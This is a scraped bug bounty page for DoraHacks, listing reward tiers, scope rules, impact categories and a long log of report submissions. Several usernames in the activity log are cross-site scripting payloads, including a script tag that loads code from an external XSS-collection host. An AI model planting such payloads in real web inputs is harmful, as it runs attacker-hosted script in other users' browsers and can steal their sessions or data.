- BUIDLs
- Grants
- Bounties
- Hackathons
- Ideas
- Live
← Back
Ongoing229 days left
2024/01/08 → 2025/01/05, 00:002024-DoraHacks Bug Bounty
$5000
- Overview
- Details
- Activities
Hunter’s Guide
How to earn crypto as a bounty hunter?
Rewards by severity level
Up to $300
Critical Up to $200
High Up to $100
Medium Up to $50
LowFunder
DoraHacks Tech Team
Organization
participants Multiple-winner bounty
In-scope criteria
Help fix DefaultPowerReduction. Only solving the specified problem will be rewareded, and only one person will be rewarded.
Out-of-scope criteria
Everything else is out-of-scope.
Assets in scope
Website/Application
Website/Application
Smart Contract
details
Program Overview
DoraHacks is a global hacker movement and the world’s most active multi-chain Web3 developer incentive platform.
The platform offers hackathons, bounty, quadratic funding, privacy voting, and other community governance/funding toolkits. In addition, over 40 major Web3 ecosystems are currently using Dora infrastructures to fund their open source communities.
More than 2000 projects from the DoraHacks community have received over $21.5 million in grants and hackathon prizes.
For more information about DoraHacks, please visit https://dorahacks.io
Reward by Threat Level
All bug reports must come with a Proof of Concept (PoC) with an end-effect impacting an asset-in-scope in order to be considered for a reward. Explanations and statements are not accepted as PoC and code is required.
Payouts are handled by the Dorahacks team directly and are denominated in USDC
Submit Form
- Goole Docs
No Real Attack
No Real Attack to the website, or we won’t provider any bounty reward
Impacts in scope
Smart Contract
- Critical
- Direct theft of any user funds
- Permanent freezing of funds
- Break the Logic to change the user value, e.g. Vote record, Stakcing Value
Websites and Applications
Critical
- Direct theft of any user funds
High
- Take Over User Account
- Change Website date without admin permission
Medium
- Change User Data without login
- Website display or busniess logic error
Ignore
- Theoretical vulnerabilities without any proof or demonstration
- DDos Attack
- Attacks requiring physical access to the victim device
- Reflected plain text injection eg: url parameters, path, etc.
- This does not exclude reflected HTML injection with or without javascript
- This does not exclude persistent plain text injection
Contract
Activities
- femi akarui submmited a reported on 2024/05/17 16:50
- femi akarui submmited a reported on 2024/05/17 16:32
- femi akarui submmited a reported on 2024/05/17 16:28
- whitehorse submmited a reported on 2024/04/14 01:46
- Huiyang submmited a reported on 2024/04/02 00:16
- Tyo Rajin Solat submmited a reported on 2024/03/26 17:07
- Rvblackmamba submmited a reported on 2024/03/25 13:19
- MxShinzu submmited a reported on 2024/03/25 13:10
- MxShinzu submmited a reported on 2024/03/25 12:57
- MxShinzu submmited a reported on 2024/03/25 12:47
- MxShinzu submmited a reported on 2024/03/25 12:40
- MxShinzu submmited a reported on 2024/03/25 12:29
- MxShinzu submmited a reported on 2024/03/25 12:23
- account_1 submmited a reported on 2024/03/25 09:26
- account_1 submmited a reported on 2024/03/25 09:18
- noxa submmited a reported on 2024/03/25 04:13
- MxShinzu submmited a reported on 2024/03/24 22:02
- "/><img src=x onerror=alert(/Stored_XSS/)> submmited a reported on 2024/03/24 05:23
- hacker5808 submmited a reported on 2024/03/24 03:10
- LazyHengker submmited a reported on 2024/03/24 00:31
- LazyHengker submmited a reported on 2024/03/23 22:11
- n00b0xe submmited a reported on 2024/03/23 21:29
- n00b0xe submmited a reported on 2024/03/23 21:23
- n00b0xe submmited a reported on 2024/03/23 21:19
- LazyHengker submmited a reported on 2024/03/23 21:10
- hacker9c20c94 submmited a reported on 2024/03/23 21:09
- hacker9c20c94 submmited a reported on 2024/03/23 21:08
- hacker9c20c94 submmited a reported on 2024/03/23 21:07
- n00b0xe submmited a reported on 2024/03/23 21:05
- LazyHengker submmited a reported on 2024/03/23 21:04
- hacker9c20c94 submmited a reported on 2024/03/23 21:03
- n00b0xe submmited a reported on 2024/03/23 20:59
- LazyHengker submmited a reported on 2024/03/23 20:53
- n00b0xe submmited a reported on 2024/03/23 20:51
- LazyHengker submmited a reported on 2024/03/23 20:44
- LazyHengker submmited a reported on 2024/03/23 20:36
- n00b0xe submmited a reported on 2024/03/23 20:32
- n00b0xe submmited a reported on 2024/03/23 20:18
- n00b0xe submmited a reported on 2024/03/23 20:12
- n00b0xe submmited a reported on 2024/03/23 20:11
- n00b0xe submmited a reported on 2024/03/23 20:07
- n00b0xe submmited a reported on 2024/03/23 20:03
- n00b0xe submmited a reported on 2024/03/23 19:49
- n00b0xe submmited a reported on 2024/03/23 19:47
- n00b0xe submmited a reported on 2024/03/23 19:46
- LazyHengker submmited a reported on 2024/03/23 19:19
- n00b0xe submmited a reported on 2024/03/23 19:06
- n00b0xe submmited a reported on 2024/03/23 19:01
- Milan jain submmited a reported on 2024/03/23 18:58
- n00b0xe submmited a reported on 2024/03/23 18:57
- n00b0xe submmited a reported on 2024/03/23 18:53
- n00b0xe submmited a reported on 2024/03/23 18:40
- n00b0xe submmited a reported on 2024/03/23 18:29
- n00b0xe submmited a reported on 2024/03/23 18:16
- n00b0xe submmited a reported on 2024/03/23 18:12
- n00b0xe submmited a reported on 2024/03/23 18:08
- n00b0xe submmited a reported on 2024/03/23 18:00
- n00b0xe submmited a reported on 2024/03/23 17:35
- n00b0xe submmited a reported on 2024/03/23 17:32
- n00b0xe submmited a reported on 2024/03/23 17:24
- n00b0xe submmited a reported on 2024/03/23 17:15
- n00b0xe submmited a reported on 2024/03/23 16:43
- n00b0xe submmited a reported on 2024/03/23 16:27
- n00b0xe submmited a reported on 2024/03/23 15:43
- n00b0xe submmited a reported on 2024/03/23 15:41
- 0xSai submmited a reported on 2024/03/23 14:34
- 0xSai submmited a reported on 2024/03/23 14:19
- 0xSai submmited a reported on 2024/03/23 13:23
- NXR submmited a reported on 2024/03/23 13:08
- n00b0xe submmited a reported on 2024/03/22 23:17
- n00b0xe submmited a reported on 2024/03/22 23:17
- '"><script src=https://xss.report/c/zh></script> submmited a reported on 2024/03/22 01:46
- Rohan Panchal submmited a reported on 2024/03/15 21:21
- Rohan Panchal submmited a reported on 2024/03/15 21:19
- Rohan Panchal submmited a reported on 2024/03/15 21:15
- D3xcR3T submmited a reported on 2024/03/12 15:54
- Rvblackmamba submmited a reported on 2024/03/12 14:18
- Rvblackmamba submmited a reported on 2024/03/12 13:58
- Wildhan submmited a reported on 2024/03/11 07:36
- NXR submmited a reported on 2024/03/07 05:26
- jiahoang submmited a reported on 2024/03/04 18:40
- jiahoang submmited a reported on 2024/03/04 18:26
- Abdelrahman-ibrahim-Farg submmited a reported on 2024/03/03 07:52
- hacker426c23f submmited a reported on 2024/02/26 15:24
- NXR submmited a reported on 2024/02/22 07:02
- NXR submmited a reported on 2024/02/22 06:47
- NXR submmited a reported on 2024/02/22 02:43
- NXR submmited a reported on 2024/02/22 02:39
- hacker426c23f submmited a reported on 2024/02/22 00:02
- hacker426c23f submmited a reported on 2024/02/21 23:34
- NXR submmited a reported on 2024/02/21 21:42
- NXR submmited a reported on 2024/02/21 21:01
- NXR submmited a reported on 2024/02/20 03:41
- NXR submmited a reported on 2024/02/20 00:17
- NXR submmited a reported on 2024/02/19 22:26
- hacker426c23f submmited a reported on 2024/02/19 21:45
- NXR submmited a reported on 2024/02/19 15:08
- NXR submmited a reported on 2024/02/19 14:52
- NXR submmited a reported on 2024/02/19 04:15
- NXR submmited a reported on 2024/02/19 03:58
- NXR submmited a reported on 2024/02/18 23:01
- NXR submmited a reported on 2024/02/18 22:31
- hacker426c23f submmited a reported on 2024/02/18 18:38
- hacker426c23f submmited a reported on 2024/02/18 18:22
- NXR submmited a reported on 2024/02/18 17:43
- hacker426c23f submmited a reported on 2024/02/18 17:39
- NXR submmited a reported on 2024/02/18 16:06
- NXR submmited a reported on 2024/02/18 05:05
- hacker426c23f submmited a reported on 2024/02/18 03:30
- NXR submmited a reported on 2024/02/18 01:04
- NXR submmited a reported on 2024/02/18 00:10
- hacker426c23f submmited a reported on 2024/02/17 18:46
- hacker426c23f submmited a reported on 2024/02/17 18:33
- hacker426c23f submmited a reported on 2024/02/17 17:50
- '"><script src=https://xss.report/c/zh></script> submmited a reported on 2024/02/17 17:25
- hacker426c23f submmited a reported on 2024/02/17 16:58
- '"><script src=https://xss.report/c/zh></script> submmited a reported on 2024/02/16 15:54
- hacker426c23f submmited a reported on 2024/02/16 01:19
- hacker426c23f submmited a reported on 2024/02/16 00:16
- hacker67aada6 submmited a reported on 2024/02/15 23:49
- hacker426c23f submmited a reported on 2024/02/15 22:58
- hacker426c23f submmited a reported on 2024/02/15 17:17
- hacker426c23f submmited a reported on 2024/02/15 16:45
- rise1507 submmited a reported on 2024/02/15 12:48
- hacker5c00f12 submmited a reported on 2024/02/14 15:55
- hacker5c00f12 submmited a reported on 2024/02/14 15:52
- Nith567 submmited a reported on 2024/02/13 18:37
- hacker1fa173d submmited a reported on 2024/02/12 16:53
- jiahoang submmited a reported on 2024/02/12 12:15
- jiahoang submmited a reported on 2024/02/08 11:10
- hacker1fa173d submmited a reported on 2024/02/03 18:02
- Kaalop1 submmited a reported on 2024/01/26 07:53
- hacker426c23f submmited a reported on 2024/01/20 21:59
- hacker426c23f submmited a reported on 2024/01/20 19:42
- hacker5c00f12 submmited a reported on 2024/01/20 18:02
- hacker5c00f12 submmited a reported on 2024/01/20 17:55
- hacker426c23f submmited a reported on 2024/01/20 15:13
- novemberelang submmited a reported on 2024/01/20 02:33
- The bounty was created on 2024/01/08 21:58
Share